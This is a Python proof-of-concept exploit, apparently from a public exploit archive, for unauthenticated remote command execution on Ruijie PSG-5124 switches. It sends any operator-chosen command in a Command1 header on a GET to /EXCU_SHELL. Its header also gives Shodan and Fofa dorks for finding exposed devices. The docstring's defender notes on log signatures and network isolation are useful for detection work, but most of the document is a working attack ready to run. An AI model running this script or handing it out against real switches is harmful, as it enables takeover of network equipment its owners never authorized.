## https://sploitus.com/exploit?id=PACKETSTORM:177570
#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)  
#- Shodan Dork: http.html_hash:-1402735717  
#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"  
#- Exploit Author: ByteHunter  
#- Email: 0xByteHunter@proton.me  
#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)  
#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)  
  
import http.client  
import argparse  
  
def send_request(ip, port, command):
    """Send one GET to ``/EXCU_SHELL`` on ``ip:port`` and print the reply.

    The command string travels in the ``Command1`` request header, next to
    ``Cmdnum: 1`` and ``Confirm1: n``. The other headers imitate a desktop
    Firefox browser. No ``Cookie`` or ``Authorization`` header is sent.

    Args:
        ip: Address of the switch's web management interface.
        port: TCP port of that interface, interpolated as given into the
            ``host:port`` string.
        command: Text placed verbatim in the ``Command1`` header.

    Returns:
        None. The status code and the UTF-8 decoded body go to stdout.
        Any exception is caught and reported as ``Request failed: ...``.

    Defender notes:
        In proxy or web-server logs this traffic is recognisable by the
        ``/EXCU_SHELL`` path together with the ``Cmdnum`` / ``Confirm1`` /
        ``Command1`` headers. Because the request carries no session
        material, the listing's RCE claim implies the endpoint acts on it
        without a login. Confirm that against your own firmware release and
        keep the management interface unreachable from untrusted networks.
    """
    target = f"{ip}:{port}"

    # Browser-looking headers: these only make the request resemble Firefox.
    browser_like = {
        "Host": target,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
    }
    # Headers specific to this endpoint. Their presence on a GET to
    # /EXCU_SHELL is the distinctive part of the request.
    endpoint_specific = {
        "Cmdnum": "1",
        "Confirm1": "n",
        "Content-Length": "0",
        "Command1": command,
    }
    # Merging keeps the original header order.
    request_headers = {**browser_like, **endpoint_specific}

    try:
        conn = http.client.HTTPConnection(target)
        conn.request("GET", "/EXCU_SHELL", headers=request_headers)
        reply = conn.getresponse()

        status_line = f"Status Code: {reply.status}"
        print(status_line)
        body_text = reply.read().decode("utf-8")
        print(body_text)
        # Closed on the success path only; a failure falls through to the
        # handler below without an explicit close.
        conn.close()
    except Exception as err:
        print(f"Request failed: {err}")
  
if __name__ == "__main__":
    # Command-line entry point. All three options are mandatory, and --port
    # is kept as the string argparse returns (no integer conversion).
    parser = argparse.ArgumentParser(
        description='proof of concept for ruijie Switches RCE'
    )
    for flag, help_text in (
        ('--ip', 'Target IP address'),
        ('--port', 'Port'),
        ('--cmd', 'Command'),
    ):
        parser.add_argument(flag, help=help_text, required=True)
    args = parser.parse_args()

    ip, port, command = args.ip, args.port, args.cmd

    # Single request; the function prints the device's response itself.
    send_request(ip, port, command)